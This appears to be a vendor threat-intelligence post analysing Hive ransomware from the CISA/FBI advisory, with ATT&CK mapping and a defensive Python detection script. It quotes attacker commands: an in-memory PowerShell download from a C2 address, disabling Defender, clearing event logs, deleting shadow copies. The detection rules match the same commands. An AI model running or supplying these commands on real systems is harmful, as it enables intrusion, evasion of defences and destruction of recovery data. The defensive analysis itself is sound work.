CISA Alert AA22-321A: Hive Ransomware Analysis, Simulation, TTPs & IOCs


On November 17, 2022, CISA and the FBI released a joint advisory on Hive ransomware [2]. The Hive ransomware group follows the Ransomware-as-a-Service (RaaS) model and targets a wide range of businesses and critical infrastructure sectors, including telecommunications, manufacturing, IT, and healthcare.

Picus Threat Library already had attack simulations for earlier variants of Hive ransomware. Picus Labs swiftly added attack simulations for the newer variants of Hive ransomware to Picus Threat Library.


Hive Ransomware Group

According to the FBI, as of November 2022, Hive ransomware has victimized more than 1300 companies, with ransom payments totaling US$100 million. Hive ransomware follows the Ransomware-as-a-Service (RaaS) model, letting its affiliates use the ransomware as they see fit. The developers of Hive ransomware continuously create, maintain and update their malware and add new defense evasion capabilities, such as evading anti-malware protections.

The victim statistics show that threat actors leveraging the Hive ransomware target a wide range of businesses and critical infrastructure sectors such as telecommunications, manufacturing, information technology, and healthcare. 

Hive Ransomware Analysis and MITRE ATT&CK TTPs

Tactic: Initial Access

How Hive actors gain their initial foothold on a target system varies with the affiliate using the RaaS. In some intrusions, threat actors used external-facing remote services such as Remote Desktop Protocol (RDP), Virtual Private Networks (VPNs), and other remote network connection protocols (ATT&CK T1133). In others, they bypassed Multi-Factor Authentication (MFA) and gained access to FortiOS servers by exploiting an improper authentication vulnerability (CVE-2020-12812) in the FortiOS SSL VPN, which allowed them to log in without providing the second authentication factor, FortiToken.

Another initial access method Hive threat actors use is phishing emails with malicious attachments that exploit the ProxyShell vulnerabilities (ATT&CK T1190).

Further analysis shows that Hive actors then deploy a webshell on the compromised Microsoft Exchange Server.

Figure 1: Deploying a webshell on the compromised Microsoft Exchange Server [1]

Microsoft released patches for the three ProxyShell vulnerabilities in April and May 2021 as part of its "Patch Tuesday" releases.

Tactic: Execution 

After establishing initial access to the compromised Microsoft Exchange Server, the Hive ransomware group executes PowerShell commands to download malicious binaries from its Command and Control (C2) server (ATT&CK T1059). The adversaries download the malware directly into the compromised host's memory and execute it with PowerShell's Invoke-Expression (IEX) cmdlet, so no file is written to disk for antivirus to scan.

IEX (New-Object Net.WebClient).DownloadString('http://139.60.161.228:3389/a')

Example 1: Downloading and executing malware using the Invoke-Expression cmdlet 

In addition, Hive actors download and execute a further obfuscated PowerShell script, which was later identified as part of the Cobalt Strike framework. VirusTotal shows that the malicious file is flagged by 41 of 69 detection engines.

Figure 2: VirusTotal result of the malicious file downloaded by Hive ransomware group

Tactic: Persistence 

The adversaries establish persistence by creating a new user called "user" and adding it to both the "Remote Desktop Users" and "Administrators" groups (ATT&CK T1136). This action also gives the new user NT AUTHORITY\SYSTEM privileges. The adversaries later use this account to access critical files containing valid user credentials, RDP access to backup servers, and so on.

Tactic: Credential Access 

Next, Hive actors use Mimikatz's sekurlsa::logonpasswords module to dump the NTLM hashes (ATT&CK T1003) of all accounts currently logged on to the system, and then use the Administrator's NTLM hash to perform a Pass-the-Hash (PtH) attack.


Figure 3: Pass-the-Hash Attack [1]

Tactic: Lateral Movement

Using the stolen credentials, the adversaries run "mstsc.exe /v:target_computer_name" to open RDP sessions (ATT&CK T1021.001) to many devices within the same network. This ensures that they reach the critical databases before deploying the ransomware, and therefore maximizes the impact.

Tactic: Discovery

Hive actors list all domain-joined assets into a file called domains.txt using the SoftPerfect tool. Then they execute a batch script called p.bat to test whether the discovered assets are alive.

for /f %%i in (domains.txt) do ping %%i -n 1 >> res.txt

Example 2: Command in the p.bat script

Tactic: Defense Evasion

The Hive ransomware group distributes a file with a benign-looking name, "windows.exe", to compromised hosts in the victim's network. In reality, this file is the ransomware payload, written in Go. The "windows.exe" payload uses several defense evasion techniques:

  • Impair Defenses: Disable or Modify Tools (ATT&CK T1562.001)

net.exe stop "SamSs" /y

Example 3: Stopping the Security Accounts Manager (SamSs) service so that SIEM systems are not alerted

  • Modify Registry (ATT&CK T1112)

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

Example 4: Disabling Windows Defender via the Registry tool (reg.exe)

  • Indicator Removal (ATT&CK T1070)

wevtutil.exe cl security
wevtutil.exe cl system
wevtutil.exe cl application

Example 5: Clearing the Windows Security, System and Application event logs

Tactic: Exfiltration 

Prior to the encryption process, the Hive ransomware group exfiltrates sensitive data from the victim host by leveraging a combination of rclone and the cloud storage service Mega.nz (ATT&CK T1537).

Tactic: Impact

vssadmin.exe delete shadows /all /quiet
wmic.exe shadowcopy /nointeractive
wmic.exe shadowcopy delete

Example 6: Deleting volume shadow copies to inhibit system recovery (ATT&CK T1490)

Upon executing the commands above, the encryption process starts. During encryption, the ransomware drops a key file (*.key) required for decryption in the root directory of the target system [2]. Then the ransom note file, HOW_TO_DECRYPT.txt, is created; it states that the key file is required for decryption and that any attempt to modify, rename or delete it will make recovery impossible (ATT&CK T1486).


Figure 4: Hive ransom note [1]

Like other ransomware groups that use the double-extortion model, Hive ransomware leaks sensitive information on their website called "HiveLeaks" if their victims do not pay the ransom.
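Defender-side example, added here and not taken from the Picus page or the advisory: a small Python triage script that checks process command lines (as Sysmon Event ID 1 or Security Event 4688 would record them) against the commands quoted in the Execution, Defense Evasion and Impact sections above. The sample lines are constructed, and the 203.0.113.10 address is a documentation-range placeholder rather than the C2 address in the report.

```python
import re

# Constructed sample process command lines modelled on the commands quoted in the
# write-up; not real telemetry. 203.0.113.10 is a documentation-range placeholder,
# not the C2 address from the report.
SAMPLE_COMMAND_LINES = [
    "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10:3389/a')",
    'net.exe stop "SamSs" /y',
    'reg.exe add "HKLM\\Software\\Policies\\Microsoft\\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f',
    "wevtutil.exe cl security",
    "vssadmin.exe delete shadows /all /quiet",
    "wmic.exe shadowcopy delete",
    "svchost.exe -k netsvcs -p",   # benign: must not match
    "ping.exe 10.0.0.5 -n 1",      # benign: ordinary reachability check
]

# One rule per command-line technique in the write-up: (ATT&CK ID, description, pattern).
RULES = [
    ("T1059", "PowerShell in-memory download and execute via IEX/DownloadString",
     re.compile(r'(?:\bIEX\b|Invoke-Expression).*DownloadString', re.I)),
    ("T1562.001", "Stopping the SamSs service",
     re.compile(r'\bnet(?:1|\.exe)?\s+stop\s+"?SamSs"?', re.I)),
    ("T1112", "Disabling Defender through the DisableAntiSpyware registry value",
     re.compile(r'\breg(?:\.exe)?\s+add\s+.*Windows Defender.*DisableAntiSpyware.*/d\s+"?1"?', re.I)),
    ("T1070", "Clearing Security, System or Application event logs",
     re.compile(r'\bwevtutil(?:\.exe)?\s+cl\s+(?:security|system|application)\b', re.I)),
    ("T1490", "Deleting volume shadow copies",
     re.compile(r'\bvssadmin(?:\.exe)?\s+delete\s+shadows|\bwmic(?:\.exe)?\s+shadowcopy\s+delete', re.I)),
]

def match_rules(cmdline):
    """Return the (ATT&CK ID, description) pairs whose pattern matches one command line."""
    return [(tid, desc) for tid, desc, rx in RULES if rx.search(cmdline)]

def scan(cmdlines):
    """Group matching command lines by ATT&CK ID. Several distinct IDs from one host in a
    short window is a much stronger ransomware-precursor signal than any single match,
    since a lone vssadmin or wevtutil call can be legitimate administration."""
    hits = {}
    for line in cmdlines:
        for tid, _ in match_rules(line):
            hits.setdefault(tid, []).append(line)
    return hits

if __name__ == "__main__":
    found = scan(SAMPLE_COMMAND_LINES)
    for tid, lines in sorted(found.items()):
        print(tid, "->", len(lines), "command line(s)")
    print("distinct Hive stages observed:", len(found))
```

In production the same rules would be fed from an EDR or SIEM command-line field, and the per-host count of distinct stages is what should drive the alert severity.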

How Does Picus Help Simulate Hive Ransomware Attacks?

Picus Threat Library already had threats for the Hive ransomware used in the earlier attack campaigns. Picus Labs added attack simulations for the latest variant of Hive ransomware. We strongly suggest simulating Hive ransomware attacks to test the effectiveness of your security controls against ransomware attacks using the Picus Complete Security Validation Platform. You can test your defenses against Hive ransomware and many other ransomware families within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Hive ransomware:

Threat ID   Action Name                       Attack Module
59759       Hive Ransomware Campaign          Endpoint
28770       Hive Ransomware Download Threat   Network Infiltration
63385       Hive Ransomware Email Threat      Email Infiltration

Indicators of Compromise (IOCs)


References

[1] N. Ovadia, "Hive Ransomware Analysis," Apr. 19, 2022. https://www.varonis.com/blog/hive-ransomware-analysis. [Accessed: Dec. 08, 2022]

[2] "#StopRansomware: Hive Ransomware." https://www.cisa.gov/uscert/ncas/alerts/aa22-321a. [Accessed: Dec. 08, 2022]